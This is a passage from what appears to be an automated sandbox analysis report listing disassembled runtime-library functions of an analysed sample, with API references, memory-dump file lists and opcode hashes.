                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                              • Instruction ID: 2bf9c193a1f54244b72e22448e38303bcf01827ff683d1aafdafbb2c0b5fb8b4
                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                              • Instruction Fuzzy Hash: 04112E7724304343DE04CA3EC4BE5B6A795EBD532172D83F6D8624B754D9229F45B500
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CA63F6 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strrchr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                              • Opcode ID: 34bc779386904af94e3a65745d8093cf5441aa8cc4e4cdc27bc5775c85d1135f
                                                                                                                                              • Instruction ID: b7b9629a933cdf12cb5c7b8eaccfd2708f12865feee445fed568c8d8079d2b18
                                                                                                                                              • Opcode Fuzzy Hash: 34bc779386904af94e3a65745d8093cf5441aa8cc4e4cdc27bc5775c85d1135f
                                                                                                                                              • Instruction Fuzzy Hash: 6DB15672D002569FDB11CF64CC81BEEBBA5EF1A318F1C4166F914AF282D674DA01CBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C91B60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C91B97
                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00C91B9F
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C91C28
                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00C91C53
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00C91CA8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                              • String ID: csm
                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                              • Opcode ID: d27a1c9f7f15ce9c7a299ec08ca0dffb8c702e2d8c577d6d840530f8f0d2717d
                                                                                                                                              • Instruction ID: 1e715b73247ab198301e39161e55e6e784a0d27c7e9ce1af0c1b1a35128bddfc
                                                                                                                                              • Opcode Fuzzy Hash: d27a1c9f7f15ce9c7a299ec08ca0dffb8c702e2d8c577d6d840530f8f0d2717d
                                                                                                                                              • Instruction Fuzzy Hash: EB41C631A0024AAFCF10DF69C88AAAEBBA5FF05314F188055EC149B392D771EA15CB90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C777F0 Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C77826
                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C77848
                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C77868
                                                                                                                                              • __Getctype.LIBCPMT ref: 00C77911
                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00C77930
                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C77948
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1102183713-0
                                                                                                                                              • Opcode ID: a36b1ca1fdaf6c3f0c80c5039b256940a681bf8176db689b56dbe3e3b50bdcac
                                                                                                                                              • Instruction ID: 562f5389ff572be451ef9bc82a8191295e3d7e58cf6cca6538c6096262637dd0
                                                                                                                                              • Opcode Fuzzy Hash: a36b1ca1fdaf6c3f0c80c5039b256940a681bf8176db689b56dbe3e3b50bdcac
                                                                                                                                              • Instruction Fuzzy Hash: 0541C870D042459FDB14EF54D885B6EFBB4EB10714F248259E819AB391DB30AE44CBE1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C66A30 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 183COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C66C3E
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C66C4D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: at line $, column
                                                                                                                                              • API String ID: 4194217158-191570568
                                                                                                                                              • Opcode ID: 2efa98237a688721be103acc3292386c2ba0223602f43fe9332362b263bbdbc2
                                                                                                                                              • Instruction ID: 8d49d1a49e510b9069e450105ca123844c3e3a126282204c73a8a42894642d95
                                                                                                                                              • Opcode Fuzzy Hash: 2efa98237a688721be103acc3292386c2ba0223602f43fe9332362b263bbdbc2
                                                                                                                                              • Instruction Fuzzy Hash: 3F512471C002049FDB18DB68DD85BAEFBB1EF89304F24825DE415A7392D774AA8097A0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C64670 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C6470F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                              • API String ID: 2659868963-1866435925
                                                                                                                                              • Opcode ID: cfa37e179e6997c2b2814f5c13c5925f2a62d610da7a1fe9d6153ae887d20d7f
                                                                                                                                              • Instruction ID: c0540890e876ecdc6f9bcedc6a548c520de21bda7aac2a26412fbba159af9fcc
                                                                                                                                              • Opcode Fuzzy Hash: cfa37e179e6997c2b2814f5c13c5925f2a62d610da7a1fe9d6153ae887d20d7f
                                                                                                                                              • Instruction Fuzzy Hash: 8211E7B29107056BC724EF58D841B96B3ECAF25310F04852AF9549B341FB70EA558BA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C8CFB9 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C8CFC0
                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C8CFCB
                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C8D039
                                                                                                                                                • Part of subcall function 00C8D11C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C8D134
                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00C8CFE6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 677527491-0
                                                                                                                                              • Opcode ID: 07e096a35937ff13b2bb5b2dbf6285cbca681d988a2f6ee04de81f28a170c4c9
                                                                                                                                              • Instruction ID: 437a2aacc54a94f7f6479ccd42d98e98167e64070939e8121b1fd39f10f7f779
                                                                                                                                              • Opcode Fuzzy Hash: 07e096a35937ff13b2bb5b2dbf6285cbca681d988a2f6ee04de81f28a170c4c9
                                                                                                                                              • Instruction Fuzzy Hash: 36018F75A002519BCB0AFF20DC8597D7B61BF84754F144009E812973C1CF786E46EBE9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C66670 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 271COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C669C5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
